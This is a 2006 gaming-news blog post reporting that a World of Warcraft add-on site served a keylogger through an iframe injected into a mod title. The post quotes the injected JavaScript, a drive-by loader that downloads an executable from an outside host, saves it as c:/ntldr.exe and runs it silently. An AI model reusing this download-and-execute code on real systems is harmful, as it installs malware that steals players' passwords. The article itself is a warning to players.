Posted Dec 21, 2006 at 02:17AM by Ryan A. Listed in: News
Ó

This is not the first time we will report on keylogging incidents for goliath MMO, World of Warcraft. Before we proceed though, let us make sure first that we are on the same page, okay?

Keystroke logging or keylogging per se is not inherently bad. Originally, it was developed to detect sources of errors in computer systems. The problem now is that same genius of a program is being used for hacking and spamming. The scam usually begins by telling a user to click on a link. Instead of bringing that user to the intended location, a keylogging software is installed discreetly. This then can be used to pick up usernames and passwords.

Now, on the official WoW forums, several users are claiming that a similar software is embedded into modification site ui.worldofwar.net. This is rather big news because the said site is one of the more "known and trusted" by players. Even here at QJ, we occasionally share with you tweaks from from that site.

One user provided these info
rmation:

  • keylogging scriptThe keylogger itself is in an iframe embedded from hxxp://ui.bcegame.com/pps.exe
  • The actual keylogger iframe: hxxp://ui.bcegame.com/wm.htm
  • Keylogger iframe src:
             xPost.Open('GET','httxxxp://ui.bcegame.com/pps.exe',0);
             xPost.Send();
             var sGet=df.CreateObject('ADODB.Stream','');
             sGet.Mode=3;
             sGet.Type=1;
             sGet.Open();
             sGet.Write(xPost.ResponseBody);
             sGet.SaveToFile('c:/ntldr.exe',2);
             var x = df.CreateObject('wscript.shell','');
             x.run('c:/ntldr.exe',0);

Currently, several group of WoW players are telling the community to ban and abandon the modification site. Ar any rate, we will update you as things develop further. Thanks Victor for the heads up!


Read Permalink  |   Email this  |   Linking Blogs   |   Digg It!

Bookmark / Find this article on:

1 Comments


Sort by:
   by Advertising -
   by D (Unregistered) - 2006-12-21
 » Update


http://wow.warcry.com/scripts/news/view_news.phtml?site=19&id=67070

UPDATE:
It looks like the mod/add-on called Stats Sniffer was the culprit. Somehow the mod author was able to put an IFrame into StatsSniffer add-on title. As of right now the mod called StatsSniffer was removed from the site.



The QJ.net Network RSS Feeds
QJ Forums
PC Gaming
Sony PSP
PlayStation 3
Xbox 360
Nintendo DS
Nintendo Wii
Blog of Blogs Feed / PDA
QJ.NET RSS / PDA
Gaming Consoles Feed / PDA
Nintendo DS RSS / PDA
PlayStation 3 RSS / PDA
PSP Updates RSS / PDA
Wii RSS / PDA
Xbox 360 RSS / PDA
PC Gaming Feed / PDA
MMORPG RSS / PDA
Personal Computer Games RSS / PDA
World of Warcraft RSS / PDA
Technology Feed / PDA
Apple RSS / PDA
iPhone - iPod Touch RSS / PDA
Add QJ.NET
Add to My Yahoo!
Google Reader Subscribe with Bloglines
Add  to your Kinja digest Subscribe in NewsGator Online
Subscribe with Pluck RSS reader Add 'www.qj.net' to Newsburst from CNET News.com
Subscribe with SearchFox RSS del.icio.us www.qj.net
Add to Technorati Favorite! Add to My AOL
furl! it Stumble for Treehugger!
User Favorites - July
Most Commented
No commented articles
User Favorites - July
Top Jumps
Toast to the Lich King - Ri.. (1)